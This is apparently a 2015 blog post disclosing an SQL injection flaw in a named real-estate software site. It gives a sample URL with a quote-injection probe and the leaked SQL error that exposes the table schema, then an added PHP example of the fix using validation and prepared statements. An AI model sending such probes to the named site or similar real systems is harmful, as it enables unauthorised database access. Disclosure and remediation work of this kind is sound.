Showing posts from July, 2015

http://www.lcsoftware.com/ | SQL injection, XSS, system compromise

sample:

http://www.lcsoftware.com/lcss-modules/listings/PublicListingController.php?Action=def&id=11%277&statusFilter=40&pageSize=5&pos=0

error:
Failed to execute query:
select listing_id, TITLE, ADDRESS, CITY, ZIP, STATE, PRICE, DESCRIPTION, TYPE_ID, BEDS, BATHS, FLOORS, SQUARE_FEET, LOT_SIZE, GARAGE_SIZE, YEAR_BUILD, ANNUAL_PROPERTY_TAX, STATUS_ID, HOME_FEATURES, COMMUNITY_FEATURES, MLS, USER_ID, CREATED, RANK, IS_FEATURE_LISTING from LCSS_LISTING WHERE USER_ID='11'7' ORDER BY STATUS_ID, PRICE ASC LIMIT 0, 5
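
The error above shows two separate defects: the id parameter is concatenated into the WHERE clause inside quotes, and the failed statement is echoed back to the client. The following is an added example of the corrected pattern, not the vendor's code: the function name listingsForUser, the reduced column list and the in-memory SQLite database (requires the pdo_sqlite extension) are assumptions made so the snippet runs on its own.

```php
<?php
// Added example, not the vendor's code. A constructed table in in-memory
// SQLite stands in for the application's database.
declare(strict_types=1);

function listingsForUser(PDO $pdo, array $query): array
{
    // Reject anything that is not a plain integer before it reaches SQL.
    $uid  = filter_var($query['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    $pos  = filter_var($query['pos'] ?? 0, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    $size = filter_var($query['pageSize'] ?? 5, FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1, 'max_range' => 100]]);
    if ($uid === false || $pos === false || $size === false) {
        http_response_code(400);            // generic failure, no SQL in the response
        return [];
    }
    try {
        // Placeholders keep request data out of the statement text entirely.
        $stmt = $pdo->prepare(
            'SELECT LISTING_ID, TITLE, PRICE, STATUS_ID FROM LCSS_LISTING
             WHERE USER_ID = :uid ORDER BY STATUS_ID, PRICE ASC LIMIT :pos, :size'
        );
        $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
        $stmt->bindValue(':pos', $pos, PDO::PARAM_INT);
        $stmt->bindValue(':size', $size, PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        error_log('listing query failed: ' . $e->getMessage()); // detail stays server-side
        http_response_code(500);
        return [];
    }
}

// Constructed sample data.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE LCSS_LISTING (LISTING_ID INTEGER PRIMARY KEY, TITLE TEXT,
            PRICE INTEGER, STATUS_ID INTEGER, USER_ID INTEGER)');
$pdo->exec("INSERT INTO LCSS_LISTING (TITLE, PRICE, STATUS_ID, USER_ID) VALUES
            ('Sample A', 250000, 40, 11), ('Sample B', 180000, 40, 11), ('Sample C', 90000, 40, 12)");

// A well-formed id returns that user's rows, cheapest first.
$ok = listingsForUser($pdo, ['id' => '11', 'pageSize' => '5', 'pos' => '0']);
echo count($ok), ' rows, first: ', $ok[0]['TITLE'], PHP_EOL;

// The value from the sample URL (%27 decodes to a single quote) is rejected
// by validation and never becomes part of a query.
$bad = listingsForUser($pdo, ['id' => "11'7", 'pageSize' => '5', 'pos' => '0']);
echo count($bad), ' rows for malformed id', PHP_EOL;
```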